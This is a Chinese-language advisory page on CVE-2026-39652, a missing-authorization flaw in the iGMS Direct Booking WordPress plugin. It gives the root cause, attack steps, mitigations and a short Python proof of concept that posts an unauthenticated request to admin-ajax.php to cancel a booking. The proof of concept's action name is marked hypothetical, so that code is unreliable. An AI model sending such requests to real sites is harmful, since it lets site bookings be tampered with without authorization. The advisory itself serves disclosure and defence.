CVE-2026-39652 CVSS 5.3 中危

CVE-2026-39652 iGMS Direct Booking权限缺失漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39652

漏洞类型

权限缺失

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

iGMS Direct Booking

漏洞概述

iGMS Direct Booking插件在1.3及之前版本中存在缺失授权漏洞。该漏洞源于对特定敏感功能的访问控制配置不正确，导致未经身份验证的远程攻击者可以利用网络访问接口绕过安全限制。攻击者无需用户交互即可利用此问题，虽然对机密性和可用性无直接影响，但可能导致系统完整性受到低程度损害，建议用户及时更新。

技术细节

漏洞根因在于iGMS Direct Booking插件的后端逻辑中未实施严格的权限校验机制。在WordPress生态中，插件通常通过AJAX接口或REST API注册处理函数以响应前端操作。受影响的版本（<= 1.3）在注册这些回调函数时，未正确限制访问权限，例如未将`nopriv`参数设为false，或者在函数内部完全缺失`current_user_can()`等标准的WordPress权限验证代码。根据CVSS向量分析，攻击复杂度低（AC:L），且无需任何权限（PR:N）和用户交互（UI:N）。这使得攻击者可以直接向`/wp-admin/admin-ajax.php`发送带有特定action参数的POST请求。由于服务器端仅验证请求格式而忽略请求者身份，攻击者得以成功调用内部函数，执行本应受限的管理员操作，从而对系统完整性构成威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描目标WordPress站点，识别是否安装了iGMS Direct Booking插件及其版本号。

STEP 2

2. 漏洞利用

攻击者构造特制的HTTP POST请求，发送至WordPress的AJAX处理接口，利用缺失的授权校验执行未授权操作。

STEP 3

3. 达成影响

服务器成功处理请求，攻击者修改了预订数据或系统设置（完整性影响），完成了攻击目标。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_missing_auth(target_url):
    """
    PoC for CVE-2026-39652 Missing Authorization in iGMS Direct Booking
    This script attempts to exploit the broken access control to modify booking data.
    """
    # The vulnerable endpoint is typically wp-admin/admin-ajax.php
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload simulating an action that should require authorization
    payload = {
        "action": "igms_direct_booking_update",  # Hypothetical action name
        "booking_id": "1",
        "status": "cancelled"
    }
    
    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if the booking status was modified.")
            print(f"[+] Response: {response.text[:100]}")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with target
    exploit_missing_auth(target)

影响范围

iGMS Direct Booking <= 1.3

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用iGMS Direct Booking插件以阻断攻击面。同时，可以通过配置Web应用防火墙（WAF）规则，拦截针对`/wp-admin/admin-ajax.php`且包含特定插件action参数的未认证请求，作为临时的缓解方案。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表